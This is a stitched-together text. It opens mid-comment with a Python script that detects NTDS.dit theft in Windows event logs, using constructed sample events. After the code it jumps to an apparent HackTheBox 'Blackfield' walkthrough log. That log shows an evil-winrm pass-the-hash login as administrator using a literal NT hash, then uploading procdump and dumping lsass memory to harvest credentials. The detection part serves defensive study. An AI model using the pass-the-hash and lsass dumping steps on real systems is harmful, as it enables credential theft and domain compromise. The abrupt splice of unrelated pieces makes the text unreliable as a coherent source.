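# Operators, like svc_backup here, is exactly what this review should catch.
EXPECTED_BACKUP_HOLDERS = {"Administrator"}


def _finding(ev):
    """Return a reason string if this single event is part of the pattern."""
    eid = ev["EventID"]
    user = ev["SubjectUserName"]
    if eid == 4672:
        # PrivilegeList is a whitespace/tab separated blob in the event
        privs = ev["PrivilegeList"].split()
        if "SeBackupPrivilege" in privs and user not in EXPECTED_BACKUP_HOLDERS:
            return "4672: SeBackupPrivilege granted to an unexpected account"
    elif eid == 4688:
        exe = ntpath.basename(ev["NewProcessName"]).lower()
        args = ev.get("CommandLine", "").lower().split()
        # /s = run diskshadow from a script file, as in the writeup
        if exe == "diskshadow.exe" and "/s" in args:
            return "4688: diskshadow.exe executed with a script (/s)"
    elif eid == 4104:
        text = ev["ScriptBlockText"].lower()
        if "ntds.dit" in text or "sebackupprivilege" in text:
            return "4104: PowerShell script block references ntds.dit/SeBackupPrivilege"
    return None


def ntds_theft_findings(events):
    """Group matching events by account: {user: [reasons]}."""
    by_user = defaultdict(list)
    for ev in events:
        reason = _finding(ev)
        if reason:
            by_user[ev["SubjectUserName"]].append(reason)
    return dict(by_user)


def high_confidence(findings):
    """Accounts that both received SeBackupPrivilege and went on to create a
    shadow copy or touch ntds.dit; a lone 4672 is just a Backup Operator logging on."""
    return sorted(user for user, reasons in findings.items()
                  if any(r.startswith("4672") for r in reasons)
                  and any(not r.startswith("4672") for r in reasons))


# Constructed sample events modelled on what the writeup does on DC01.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeMachineAccountPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege"},
    {"EventID": 4688, "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow /s puckiestyle.txt"},
    {"EventID": 4104, "SubjectUserName": "svc_backup",
     "ScriptBlockText": "Copy-FileSeBackupPrivilege z:\\Windows\\NTDS\\ntds.dit C:\\programdata\\ndts.dit"},
    # expected holder: no finding for the privilege itself
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "PrivilegeList": "SeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege"},
    # interactive diskshadow without a script: not flagged
    {"EventID": 4688, "SubjectUserName": "Administrator",
     "NewProcessName": "C:\\Windows\\System32\\diskshadow.exe",
     "CommandLine": "diskshadow"},
    {"EventID": 4104, "SubjectUserName": "audit2020",
     "ScriptBlockText": "Get-ChildItem C:\\forensic"},
]

if __name__ == "__main__":
    found = ntds_theft_findings(SAMPLE_EVENTS)
    for user, reasons in found.items():
        print(user, "->", "; ".join(reasons))
    print("high confidence:", high_confidence(found))
```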
Login as administrator
└─$ evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
And we pwned it …….
procdump
*Evil-WinRM* PS C:\temp> upload procdump.exe
                                        
Info: Uploading /home/puck/htb/blackfield/procdump.exe to C:\temp\procdump.exe
                                        
Data: 1055944 bytes of 1055944 bytes copied
       
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload Eula.txt
                                        
Info: Uploading /home/puck/htb/blackfield/Eula.txt to C:\temp\Eula.txt
                                        
Data: 9984 bytes of 9984 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass C:\\Temp\\lsass.dmp
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[14:47:00] Dump 1 initiated: C:\Temp\lsass.dmp
[14:47:01] Dump 1 writing: Estimated dump file size is 155 MB.
[14:47:05] Dump 1 complete: 155 MB written in 4.7 seconds
[14:47:05] Waiting for dump to complete...
[14:47:05] Dump count reached.
*Evil-WinRM* PS C:\temp> ls
    Directory: C:\temp
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/29/2025   2:46 PM           7490 Eula.txt
-a----        1/29/2025   2:47 PM      158123094 lsass.dmp
-a----        1/29/2025   2:45 PM         791960 procdump.exe
*Evil-WinRM* PS C:\temp> 